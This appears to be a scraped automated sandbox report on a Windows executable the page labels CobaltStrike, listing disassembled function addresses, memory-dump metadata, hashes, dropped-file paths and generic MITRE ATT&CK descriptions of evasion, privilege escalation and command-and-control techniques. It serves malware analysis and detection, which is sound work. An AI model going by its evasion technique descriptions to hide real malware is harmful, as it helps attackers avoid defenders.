Function 00007FF71A811835 Relevance: 5.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A81190D
memcpy.MSVCRT ref: 00007FF71A81193A
memcpy.MSVCRT ref: 00007FF71A811952
memcpy.MSVCRT ref: 00007FF71A811991
memcpy.MSVCRT ref: 00007FF71A813487
memcpy.MSVCRT ref: 00007FF71A8134EE
memcpy.MSVCRT ref: 00007FF71A81351C
memcpy.MSVCRT ref: 00007FF71A81354F
memcpy.MSVCRT ref: 00007FF71A813596
memcpy.MSVCRT ref: 00007FF71A813686
memcpy.MSVCRT ref: 00007FF71A8136EA
memcpy.MSVCRT ref: 00007FF71A813720
memcpy.MSVCRT ref: 00007FF71A813753
memcpy.MSVCRT ref: 00007FF71A81379D
memcpy.MSVCRT ref: 00007FF71A81381B
memcpy.MSVCRT ref: 00007FF71A813867
memcpy.MSVCRT ref: 00007FF71A8138B4
memcpy.MSVCRT ref: 00007FF71A813924
memcpy.MSVCRT ref: 00007FF71A813996
memcpy.MSVCRT ref: 00007FF71A813A15
memcpy.MSVCRT ref: 00007FF71A813A5A
memcpy.MSVCRT ref: 00007FF71A813ABC
memcpy.MSVCRT ref: 00007FF71A813B36
memcpy.MSVCRT ref: 00007FF71A813B58

Part of subcall function 00007FF71A7E5AB3: memcpy.MSVCRT ref: 00007FF71A7E5BE5

memcpy.MSVCRT ref: 00007FF71A813BE1
memcpy.MSVCRT ref: 00007FF71A813C0E
memcpy.MSVCRT ref: 00007FF71A813C7E
memcpy.MSVCRT ref: 00007FF71A813CA3

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a53f08c2fb473f85f090ac046380d8d580e4321932f3453a7195799228a45d5c
Instruction ID: 8ef985b14152c32b11928abb9943c98b6e888cc2b6ea7bf70fb11fc011050814
Opcode Fuzzy Hash: a53f08c2fb473f85f090ac046380d8d580e4321932f3453a7195799228a45d5c
Instruction Fuzzy Hash: DD417162B08FD284FBA1DA01A0547EAE7A4F7817A4F844036DE9D17B89DF7CE149C710

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 31#U544a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
31#U544a.exe

Function 00007FF71A7F0C67 Relevance: 21.8, APIs: 7, Strings: 7, Instructions: 832
COMMON

Function 00007FF71A820507 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 296
networkCOMMON

Function 00007FF71A80E2CE Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 527
COMMON

Function 00007FF71A80E336 Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 521
COMMON

Function 00007FF71A80E2AE Relevance: 15.5, APIs: 9, Strings: 1, Instructions: 511
COMMON

Function 00007FF71A7E29FC Relevance: 12.8, APIs: 5, Strings: 3, Instructions: 849
COMMON

Function 00007FF71A7A1190 Relevance: 12.2, APIs: 8, Instructions: 203
sleepstringCOMMON

Function 00007FF71A7E1777 Relevance: 41.2, APIs: 26, Strings: 1, Instructions: 706
COMMON

Function 00007FF71A7DF081 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 601
encryptionCOMMON

Function 00007FF71A7E1789 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 265
COMMON

Function 00007FF71A7E3C68 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 388
networkCOMMON

Function 00007FF71A8458B0 Relevance: 9.2, APIs: 6, Instructions: 194
networkCOMMON

Function 00007FF71A7F097B Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 163
COMMON

Function 00007FF71A7CD345 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 188
networkCOMMON

Function 00007FF71A7DD8E0 Relevance: 7.7, APIs: 6, Instructions: 198
COMMON